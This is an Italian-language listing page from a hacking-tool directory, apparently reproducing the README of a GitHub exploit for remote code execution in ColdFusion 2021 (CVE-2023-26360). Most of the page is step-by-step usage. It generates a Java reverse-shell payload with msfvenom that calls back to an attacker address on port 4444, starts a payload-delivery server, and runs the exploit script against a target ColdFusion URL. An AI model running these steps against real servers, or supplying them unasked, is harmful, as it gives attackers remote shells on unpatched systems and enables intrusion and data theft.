Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-26360-RCE — Exploit per l'esecuzione di codice in remoto in ColdFusion 2021 (CVE-2023-26360) | Kitploit
Strumenti/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

Exploit per l'esecuzione di codice in remoto in ColdFusion 2021 (CVE-2023-26360)

Vedi Repository
11310 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-26360 - Esecuzione di codice remoto su ColdFusion 2021

A volte, gli script non funzionano al primo tentativo. Prova alcune volte per farli funzionare

Come eseguire

Creare un payload con msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

Avviare server.py

  • Questo server invierà il payload al server Coldfusion dopo l'accesso iniziale con cve.2023-26360.py, quindi deve essere avviato per primo.
root@kitploit:~
python3 server.py 8000
  • L'argomento 8000 è la porta su cui il server resterà in ascolto.

  • È importante notare che la riga 12 configura l'indirizzo IP del server, quindi modificalo:

  • root@kitploit:~
    s.bind(('192.168.56.1',port))
    

    Eseguire cve-2023-26360.py

    • Per eseguire l'exploit, esegui:
    root@kitploit:~
    python3 cve-2023-26360.py 8000
    
    • Come in server.py, l'argomento 8000 è la porta su cui server.py resterà in ascolto. Quindi, deve essere uguale in entrambi i comandi.

    • La riga 8 di cve-2023-26360.py imposta l'indirizzo IP su cui server.py resterà in ascolto. È necessario configurarlo correttamente.

    • La riga 11 di cve-2023-26360.py imposta l'indirizzo IP del server Coldfusion, quindi modificalo:

    root@kitploit:~
    url = "http://192.168.56.102:8500"
    

    Testato su

    • ColdFusion 2021 - Windows Server 2019
    Scarica lo strumento